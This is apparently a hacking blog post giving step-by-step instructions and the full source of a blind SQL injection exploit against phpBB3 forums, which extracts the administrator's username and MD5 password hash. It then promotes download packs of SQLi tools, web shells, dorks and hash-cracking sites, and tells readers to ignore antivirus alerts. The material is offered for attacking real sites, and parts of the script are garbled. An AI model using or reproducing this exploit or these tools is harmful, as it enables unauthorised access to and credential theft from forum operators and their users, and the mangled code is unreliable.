Pages

how to hack phpbb 3 board (forum)

PHPBB3 Exploit !!

EDIT: DOWNLOAD THE LATEST PACK CONTAINING ALL THE TOOLS FOR THIS HACKING PROCESS : http://adf.ly/BimX

1. download and isntall the latest version of php (google it)
2. Copy and paste the whole long code below into a .txt document i.e. notepad and save it as whatever you wanan call it.
3. right click the txt document and change the ending from .txt to .php
4. go start - run - type cmd - hit enter
5. type : cd (location of where you instaleld php to i.e. cd C:\programfiles\php ) and hit enter
6. now you are in the location on where you isntalled php to (in the cmd box) type "php", then name of whatever you named the exploit and hit enter
7. your done, its self-explanatory from there .... i think.

i think those instructions will work or something like that, ive always been **** at using php exploits, much preferred perl/python/ruby one's but w/e.


PHP Code:
#!/usr/bin/php -q -d short_open_tag=on
rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) result="'';$exa=" cont="0;" i="0;"> 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } if ($temp=="-u") { $user_id=str_replace("-u","",$argv[$i]); } if ($temp=="-x") { $discl=1; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } if (eregi("_u=1;",$cookie)) { //echo $html."\n";//debug //die("Unable to login..."); } echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++) { if (in_array($i,$md5s)) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>



***********************************************************************************
NEWS BUZZ:

Hello everybody ,

since i started learning SQLi , i have collected lots of good tools and documents , m still collecting more and more day by day as my scope of knowledge is increasing .
So thought of sharing what i have collected till now with everyone here,
My tool pack includes the following things.

DOWNLOADS :

SQLI SCANNER PACK : http://adf.ly/6tth
MD5 tools pack : http://adf.ly/6tuV
ADMIN FINDR : http://adf.ly/6tuk
SQLI TUTORIAL PACK : http://adf.ly/6tuw
DORKS PACK : http://adf.ly/6tv7
SHELLS PACK : http://adf.ly/6tvD

DONT DOWNLOAD IF YOU DONT KNOW WHAT ARE FALSE POSITIVE VIRUS ALERT

1) sqli scanner/automating injection pack :
contains 5 softwares for scanning ,and automating the hacking process

(a) Exploit scanner - for finding websites with dorks , and testing them for vulnerabilities.very famous
(b) Turkish ARTA - same as exploit scanner but not as famous bcos its turkish . i find it better then exploit scanner. but that my personal opinion
© Havij 1.12 free version : i guess everyone knows about it. it automates the process of performing sqli attack on any site.
it is extremely famous and efficient. but still it a tool :) nothing compared to manual process
(d) SQLI helper 2.7 : same like havij , but little fast .
(e)sqlinj Version 2 - another nice sql injection tool . i will write a tut later how to use this tool

2) ADMIN Finder pack :
After getting the logins from the database . one needs to get the admin finder page. for some sites its very easy while for smoe site its hellova tough
here are some nice admin finder tools and lists tht u may use. but these tools are never enough .i will keep uploaing the amin finder lists as i get more

(a)reiiuke admin finder ( u can upadt the original admin finder lists with the list i am providing)
(b)5 perl and python admin finder tools/scripts. update them as per ur need
© misc softwre : admin pass locater , to brute force admi pass if u cant find it

YOU MIGHT ALSO LIKE THIS SITE
http://th3-0utl4ws.com/tools/admin-finder/

3) DORKS Pack : Contains many files contiaing more then 7000 dorks.

4) Shells : this pack contins many shells and source codes , like c99 ,c100 , jackel and hellova more
( many shells like c99 are identified as trojans by many antivirus. so u might find ur antivirus shouting about this pack. )
U might also wanna see this site :
http://www.kinginfet.net/shells/

5) MD5 cracking tools : although havij have md5 tool but for some reason it never worked for me . so this pack contains some tools .
ASLO THESE SITES WILL PROVE YOU GREAT HELP
http://www.md5decrypter.com/
http://www.md5decrypter.co.uk/
http://md5.rednoize.com/
http://md5decryption.com/
http://passcracking.com/
http://www.xmd5.org/
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org

6) SQLI tutorials pack : This pack contain complete html pages of sqli tutorails that i found useful from various forums and websites like hackforum , elitesoft ,warex , outlaws etc etc. i bet every newbe will love this pack .
u just need a firefox browser to open these html files.
NOTE: this pack also contain 2 of my own created sqli help files which i created myself, serves me as a very useful docment wheneever i m on to hack some site.

i will kep updating these packs as i learn and collect more and more .

1 comments:

Anonymous said...

Just popping in to say nice site.